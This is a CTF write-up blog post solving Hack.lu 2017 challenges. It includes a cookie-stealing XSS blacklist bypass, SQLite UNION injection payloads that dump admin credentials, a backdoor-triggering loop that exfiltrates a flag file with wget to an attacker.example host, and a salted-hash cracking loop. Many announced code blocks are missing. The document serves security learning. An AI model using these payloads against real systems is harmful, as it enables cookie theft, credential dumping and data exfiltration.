Văn Hòa Nguyễn, published in tradahacking, Oct 19, 2017


Hack.lu 2017

(Misc, Web) DnSoSecure — by kunte_, utnubu -100 (+ 100)

We found this Flag-Submission-Service that is used by the OTHER-SIDE. Try to get it to submit the flag to you!

Viewing the page source gives us the source of this challenge:

The index file validates the input text and then does the secret part:

So this problem is about faking DNS and *bypassing* the DNSSEC checker function. After a while spent trying to crack the public key, I found out that the served source tree contains a .git directory; checking out eddb23375ea4e08c67a63088ea08b4d5fc18a406 gives us the private keys, and that is enough to build a DNS server for this problem.

(Web, Rev) Triangle — by kunte_ -100 (+ 64)

Everything is controlled by the Triangle!

It is just a basic JavaScript-only webpage which checks the login with the following function:

These methods are defined in secret.js; a simple deobfuscation gives us:

So both test_pw and enc_pw use Unicorn to emulate some ARM code. Dumping those memory images and loading them into IDA gives us:

test_pw assembly:

enc_pw assembly:

Rewriting these functions in PHP:

Then it is easy to invert these functions:

And then it is easy to get the code:

MPmVH94PTH7hhafgYahYaVfKJNLRNQLZ

(Web) Mistune — by kunte_ -150 (- 18)

Markdown parsers are fun. Now click here and steal the cookie!

It is a markdown-rendering service where we can test the output of their internal markdown renderer and submit messages to the admin written in markdown.

Try to steal the cookie!

We use mistune.Renderer(escape=True, hard_wrap=True)

The admin will look at your converted Markdown.

The admin will click on links (<a/>).

So this problem is clearly XSS and requires us to obtain the admin's cookie. Looking at the mistune source gives us

So javascript: scheme URLs are blacklisted, but we can easily bypass that with a carriage return character: "javascript\r:document.location.href=(...)+document.cookie". The blacklist compares the URL prefix literally, while the browser strips the \r when it parses the URL, so the link still runs as javascript:. Then we just wait for the flag. We can input that carriage return by running a command in the console:

(Crypto) b64 — by Sceptic -100 (+ 66)

Taking part in elite, exclusive groups entails being able to hide secrets from the lesser folk and only provide it to the gifted. Our intern recently proposed a solution to do just that.

nc flatearth.fluxfingers.net 1718

Download

Problem source:

For each new session, the server creates a new random message and allows us to decode up to MAX_TRIES messages with the provided crypt function: it keeps only the base64-compatible characters in a new string, removes the last character if that string's length is 1 mod 4, and finally base64-decodes the result.

We can easily find the secret message by enumerating each byte, except for bytes 0 and 4, where we need to enumerate 2 bytes; for the others, enumerating only the 4 MSBs is enough, so 1 + 256*2 + 16*6 = 609 tries in the worst case, which is more than enough.

(Crypto) prime enigma — by midao — 50 (+ 100)

Hey there fellow lizard how nice of you to drop by! Did you know those filthy humans really think that some numbers have special meanings? Seven, 13 and for some strange reason even 9000. Go and show them that a good prime does not make a secure cryptosystem!

Link

This problem encrypts the message using some big exponent as the private key, and provides us with the ciphertext and a hint number.

Looking at ciphertext.txt shows that B == p - 1, i.e. g^d ≡ -1 (mod p). Since a generator g of Z_p^* satisfies g^((p-1)/2) ≡ -1 (mod p), d is probably (p-1)/2; just trying it gives us the flag:

flag{If you whistle while you’re pissing, you have two minds, where one is quite sufficient. If you have two minds, you are at war with yourself. If you are at war with yourself, it is easy for an external force to defeat you. This is why Mong-tse wrote. ‘A man must destroy himself before others can destroy him.’ | Lorem ipsum dolor sit amet, consectetur adipisici elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamaco laboris nisi …}

(Crypto) salsa — by SLAZ — 200 (+ 15)

The Flat Earth Society has a secret information storage. There is enough evidence in it, to convince every member of them, that the earth is round. Unfortunately, we don’t have the key …
nc flatearth.fluxfingers.net 1721

Download

This problem provides an encryption named salsa20, sends us the flag encrypted, and allows us to encrypt 8192 bytes of our own data.

Below is the main implementation of the encryption:

It clearly shows that this encryption just XORs the input buffer with a keystream, and that the keystream is shifted by one byte for each new encryption (controlled by si).

C1 = M1 xor Keystream1

C2 = M2 xor Keystream2

Keystream2 = Keystream1[1:]

So,

M1[1:] = C1[1:] xor Keystream1[1:]

= C1[1:] xor Keystream2

= C1[1:] xor C2 xor M2

That’s enough to code the solver:
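As an added example (not the writeup's solver), the derivation above carried through in code. ShiftingKeystreamCipher is a toy model of the flawed cipher as described in this section, constructed for the example: the same keystream for every message, with the start offset si advanced by one byte per call. The keystream and flag are constructed; against the real service the first call below is the server encrypting the flag and the second is our 8192-byte encryption request.

```python
class ShiftingKeystreamCipher:
    """Toy model of the challenge's flawed 'salsa20' (constructed for this example,
    not the challenge's code): every message is XORed with the same keystream, and
    the start offset si only advances by one byte per encryption."""

    def __init__(self, keystream: bytes):
        self.keystream = keystream
        self.si = 0

    def encrypt(self, msg: bytes) -> bytes:
        ks = self.keystream[self.si:self.si + len(msg)]
        if len(ks) < len(msg):
            raise ValueError("keystream exhausted")
        self.si += 1
        return bytes(m ^ k for m, k in zip(msg, ks))


def recover_tail(c1: bytes, c2: bytes, m2: bytes) -> bytes:
    """M1[1:] = C1[1:] xor Keystream2 = C1[1:] xor C2 xor M2."""
    n = min(len(c1) - 1, len(c2), len(m2))
    return bytes(c1[1 + i] ^ c2[i] ^ m2[i] for i in range(n))


def recover_flag(c1: bytes, encrypt_oracle, first_byte: bytes = b"f") -> bytes:
    """Recover the flag from its ciphertext plus one chosen-plaintext query.
    Keystream1[0] is never reused, so the very first byte cannot be derived;
    the known flag{...} format supplies it."""
    m2 = bytes(len(c1) - 1)           # all-zero plaintext, so C2 is exactly Keystream2
    c2 = encrypt_oracle(m2)
    return first_byte + recover_tail(c1, c2, m2)


def demo() -> tuple:
    keystream = bytes(range(256)) * 4      # constructed fixed keystream (the real one is random)
    flag = b"flag{constructed_example_flag}"
    cipher = ShiftingKeystreamCipher(keystream)
    c1 = cipher.encrypt(flag)              # the server's first encryption: the flag, si = 0
    recovered = recover_flag(c1, cipher.encrypt)   # our query runs at si = 1
    return flag, recovered


if __name__ == "__main__":
    flag, recovered = demo()
    print(recovered, recovered == flag)
```

Choosing an all-zero M2 is only a convenience: any known M2 works, since it cancels out in C1[1:] xor C2 xor M2.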

(Web, Pwn) Indianer — by hasiH451–200 (+ 36)

Try to enter this Tipi

Download

The archive provides us with a shared library, backdoor.so, which overrides the strlen function:

So we can trigger the backdoor by first including ndex.html in the URL. In order to reach the apr_hook_debug_enabled = system(sa); line, all the enclosing ifs must be satisfied:

if ( trigger & 1 )

trigger is an incrementing counter, so this fires once every 2 requests.

if ( g_idx[0] > 1u )

g_idx[0] is also a counter, incremented whenever the first if is satisfied.

slen = old_strlen(s_1, (const char *)slen);
s = (char *)memmem(s_1, slen, needle, 34uLL);
if ( s )

so it searches the string for the full 34-byte needle,

if ( *shell_buf == '=' )

then checks that the buffer continues with '=',

while ( 1 )
{
slen = '_';
v6 = strchr(sa, '_');
if ( !v6 )
break;
*v6 = ' ';
}
apr_hook_debug_enabled = system(sa);

replaces every '_' with a space and then executes that buffer via system().

So let's compute the needle at that state:

which gives us

eqeqeqbnbnbnbnbkwkwkwkwhththththqeq

And then finally we can start netcat on our server ($server:$port below) and use wget to send the command output to it. The first request only advances the counters; the backdoor fires on every second request once g_idx[0] > 1, hence the loop:

$server = 'attacker.example'; $port = 1337;   // our netcat listener
$base = 'https://indianer.flatearth.fluxfingers.net/';
$cmd = "wget http://$server:$port/`cat /var/www/flag.txt`";   // '_' becomes ' ' inside the backdoor
file_get_contents($base . 'ndex.html');
for ($i = 0; $i < 40; $i++) {
    echo file_get_contents($base . 'eqeqeqbnbnbnbnbkwkwkwkwhththththqeq=' . str_replace(' ', '_', $cmd));
}

(Misc, Web) flatscience — by Staubfinger — 100 (+ 90)

The Professor on Flat Earth is Prof. Flux Horst. Only for bragging he made his own Blog showcasing his favorite Papers. Being the only Professor, he thinks he is the smartest Person around the Plate. Can you prove him wrong and log into his Admin-Panel?
Link

robots.txt provides us:

User-agent: *
Disallow: /login.php
Disallow: /admin.php

The login.php source contains:

<!-- TODO: Remove ?debug-Parameter! -->

So let's try appending ?debug to that page, which shows us the source code:

That's clearly SQLite injection; we can obtain the schema with

usr=' union select 1,(select sql from sqlite_master limit 1) -- &pw=

gives us

CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)

Then query the admin credentials:

usr=' union select 1,(select id || '; ' || name || '; ' || password || '; ' || hint from Users limit 1) -- &pw=

gives us:

1; admin; 3fab54a50e770d830c0416df817567662a9dc85c; my fav word in my fav paper?!
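As an added example, not part of the original writeup: a small in-memory SQLite model of the login that these two payloads target, with the vulnerable query beside its parameterised form. The query shape (two selected columns, the second echoed back to the user) and the admin row are assumptions reconstructed from the payloads and the dumped schema, not the challenge's real code; the salt is the one used in the cracking loop further down.

```python
import hashlib
import sqlite3

SALT = "Salz!"   # the salt used in the writeup's password-cracking loop

# Schema as dumped from sqlite_master in the writeup; the admin row is constructed
# here so the demo can also verify a legitimate login.
SCHEMA = ("CREATE TABLE Users(id int primary key, name varchar(255), "
          "password varchar(255), hint varchar(255))")
ADMIN_PASSWORD = "ThinJerboa"


def hash_password(pw: str) -> str:
    return hashlib.sha1((pw + SALT).encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.execute("INSERT INTO Users VALUES (1, 'admin', ?, 'my fav word in my fav paper?!')",
               (hash_password(ADMIN_PASSWORD),))
    return db


def login_vulnerable(db, usr: str, pw: str):
    """Query shape implied by the two-column UNION payloads (an assumption about the
    challenge, not its real code): user input is pasted into the SQL string and the
    second selected column is echoed back on success."""
    sql = (f"SELECT id, name FROM Users WHERE name = '{usr}' "
           f"AND password = '{hash_password(pw)}'")
    row = db.execute(sql).fetchone()
    return row[1] if row else None


def login_safe(db, usr: str, pw: str):
    """Same query with bound parameters: the quote in the payload is just data."""
    row = db.execute("SELECT id, name FROM Users WHERE name = ? AND password = ?",
                     (usr, hash_password(pw))).fetchone()
    return row[1] if row else None


# The two payloads from the writeup, exactly as sent in the usr field
# (the trailing "-- " comments out the rest of the original WHERE clause).
SCHEMA_PAYLOAD = "' union select 1,(select sql from sqlite_master limit 1) -- "
CREDS_PAYLOAD = ("' union select 1,(select id || '; ' || name || '; ' || password "
                 "|| '; ' || hint from Users limit 1) -- ")


def demo() -> dict:
    db = setup_db()
    return {
        "schema_leak": login_vulnerable(db, SCHEMA_PAYLOAD, ""),   # CREATE TABLE Users(...)
        "creds_leak": login_vulnerable(db, CREDS_PAYLOAD, ""),     # 1; admin; <sha1>; my fav word ...
        "safe_with_payload": login_safe(db, SCHEMA_PAYLOAD, ""),   # None
        "safe_legit": login_safe(db, "admin", ADMIN_PASSWORD),     # 'admin'
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The UNION needs exactly as many columns as the original SELECT, which is why both payloads select a dummy 1 first; with bound parameters the same input is compared as a literal user name and the query simply finds no row.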

So just scrape all the PDFs, extract their text with pdftotext, and test every word as the password:

foreach (glob("pdfs/*.pdf") as $pdf) {
    passthru("pdftotext " . escapeshellarg($pdf));   // writes <name>.txt next to the PDF
    $txt = file_get_contents(substr($pdf, 0, -4) . ".txt");
    preg_match_all("@[^\n\r\t\s]+@", $txt, $m);      // every whitespace-separated token
    foreach ($m[0] as $word) {
        // salted SHA-1 of the candidate word against the admin hash from the Users table
        if (sha1($word . "Salz!") === "3fab54a50e770d830c0416df817567662a9dc85c") {
            die($word);
        }
    }
}

Password is ThinJerboa, logging into admin.php give us the flag:

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

(Rev) The Maya Society — by kunte_ — 50 (+ 91)

Maya society was broken into a class structure with four main levels: the nobility (Maya almehenob), the priesthood (Maya ahkinob), the common people (Maya ah chembal uinieol), and the slaves (Maya ppencatob). The most powerful of the ruling elite was known as the halach uinic. The halach uinic are alive and still secretly hold meetings today. You have to reverse engineer their communication and infiltrate the ruling elite. Link

The webpage has a download button which provides a launcher file:

$ file launcher
launcher: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=464269c36073a8820e69146b00cc8e68d1f50718, stripped

Loading it in IDA gives us:

So this main file does something starting from a string built from the current date. The original webpage contains © 2012, which hints that the page was created in 2012, so I wrote a simple C file to use with LD_PRELOAD to fake the time:

#include <stdlib.h>
#include <time.h>
/* build: gcc -shared -fPIC -o fake.so fake.c */
time_t time(time_t *tloc) {              /* same signature as libc's time() */
    const char *env = getenv("CURR_TIME");
    time_t t = env ? (time_t)atol(env) : 0;
    if (tloc) *tloc = t;
    return t;
}

Then trying every timestamp starting from 2012-01-01 gives us the password at 2012-12-21:

$ CURR_TIME=1356066000 LD_PRELOAD=$(pwd)/fake.so ./launcher
flag{e3a03c6f3fe91b40eaa8e71b41f0db12}
